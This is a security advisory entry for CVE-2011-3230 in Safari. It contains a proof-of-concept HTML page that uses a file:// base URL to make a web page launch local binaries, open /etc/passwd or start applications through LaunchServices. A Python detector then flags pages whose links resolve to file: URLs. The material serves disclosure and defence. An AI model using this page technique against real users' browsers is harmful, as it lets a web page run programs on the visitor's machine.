Apple Safari Arbitrary Code Execution

Source: packetstormsecurity.com (PACKETSTORM:105827)
Author: Aaron Sigel
Date: 2011-10-15
EPSS: 0.909 (High), percentile 98.5%
CVE: CVE-2011-3230
Found By: Aaron Sigel of vtty.com

There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below.

```html
<html>
<head>
  <!-- With the document base set to file://, the relative paths below resolve to file: URLs -->
  <base href="file://">
  <script>
    function DoIt() {
      alert(document.getElementById("cmdToRun").value);
      // Navigating to the resolved file: URL hands it to LaunchServices
      document.location = document.getElementById("cmdToRun").value;
    }
  </script>
</head>
<body>
  <select id="cmdToRun">
    <option value="/usr/sbin/netstat">Launch /usr/sbin/netstat</option>
    <option value="/etc/passwd">Launch /etc/passwd</option>
    <option value="/Applications/Utilities/Bluetooth File Exchange.app">
      Launch Bluetooth File Exchange.app</option>
  </select>
  <br />
  <input type="button" value="Launch" onclick="DoIt()">
  <br />
</body>
</html>
```

Apple's advisory: http://support.apple.com/kb/HT5000
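As an added example (not part of the advisory), here is a small Python check that a content filter or proxy could run on fetched HTML: it parses the page, resolves each navigation target against its `<base href>` the way the browser does, and flags any page served over http(s) whose targets would resolve to a file: URL. The sample HTML, the `example.test` page URL and the function names are constructed for this example.

```python
"""Flag HTML whose <base href> pushes relative navigation onto the file:
scheme (the CVE-2011-3230 pattern) and show what each target resolves to."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _BaseAndTargets(HTMLParser):
    """Collect the first <base href> and every <option value> / <a href>."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and self.base is None and a.get("href"):
            self.base = a["href"]
        elif tag == "option" and a.get("value"):
            self.targets.append(a["value"])
        elif tag == "a" and a.get("href"):
            self.targets.append(a["href"])


def scan_html(doc, page_url="http://example.test/page.html"):
    """Return (base_href, [(target, resolved_url, is_file), ...]).

    page_url (constructed) is where the page was fetched from. The <base href>
    is first resolved against it, then every target against that effective
    base; this mirrors how the browser builds the URL it navigates to."""
    p = _BaseAndTargets()
    p.feed(doc)
    effective_base = urljoin(page_url, p.base) if p.base else page_url
    rows = []
    for t in p.targets:
        resolved = urljoin(effective_base, t)
        rows.append((t, resolved, urlsplit(resolved).scheme == "file"))
    return p.base, rows


def is_suspicious(doc, page_url="http://example.test/page.html"):
    """True when a page fetched over http(s) would navigate to a file: URL."""
    if urlsplit(page_url).scheme not in ("http", "https"):
        return False  # a page opened from disk may legitimately use file: links
    return any(is_file for _, _, is_file in scan_html(doc, page_url)[1])


# Constructed samples: the first mirrors the advisory's PoC shape, the second
# is an ordinary page that uses <base> for its own site path.
SAMPLE = """<html><head><base href="file://"></head><body>
<select id="cmdToRun"><option value="/usr/sbin/netstat">netstat</option>
<option value="/etc/passwd">passwd</option></select></body></html>"""
BENIGN = """<html><head><base href="/static/"></head><body>
<a href="docs/index.html">docs</a></body></html>"""
```

Note that `urljoin` does not percent-encode spaces, so a path such as the Bluetooth File Exchange one shows up unescaped here while a browser would encode it; the scheme check is unaffected.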